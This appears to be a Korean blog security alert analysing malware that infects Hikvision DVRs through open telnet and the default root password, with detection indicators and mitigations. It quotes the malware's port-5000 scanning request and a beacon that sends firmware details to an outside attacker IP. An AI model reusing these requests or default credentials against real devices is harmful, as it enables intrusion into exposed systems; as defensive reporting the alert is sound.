[SecurityPlus Alert] 5000번 포트스캐닝 - Hikvision DVR 시스템 노린 악성코드 주의
1. 분석 보고
- 리눅스 시스템 기반 Hikvision DVR 시스템에 대해 공격하는 악성코드로 해당 악성코드에 침해당한 시스템 상의 /dev/cmd.so에 위치.
- 공격 받은 취약한 Hikvision DVR 시스템의 경우, 외부로 telnet 포트가 오픈되어 있으며, 기본 Root 패스워드(12345) 사용.
- 악성코드는 ARM binary로 되어 있으며, Synology 디바이스를 찾기 위해 다음과 같은 5000번 포트 스캐닝 수행.
GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
- 포트 스캔 결과 응답이 있으면 firmware 정보를 다음과 같이 162.219.57.8로 전송
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
- 위와 같이 포트 스캐닝을 통해 취약한 디바이스 탐지 후, 공격 수행.
2. 대응 조치
- 사용 Hikvision DVR에 대해 피해 여부 확인
(1) /dev/cmd.so 파일 존재 여부 확인
(2) 162.219.57.8 접속 로그 확인
(3) /webman/info.cgi?host, /k.php?h=%lu 웹 로그 존재 여부 확인
- 만일 아직 피해를 입지 않았다면,
(1) 취약하지 않은 버젼으로 Firmware 및 관련 소프트웨어 업그레이드
(2) 기본 Root 패스워드 변경
(3) 불필요하게 외부 오픈된 Telnet 혹은 SSH 포트 차단
댓글 없음:
댓글 쓰기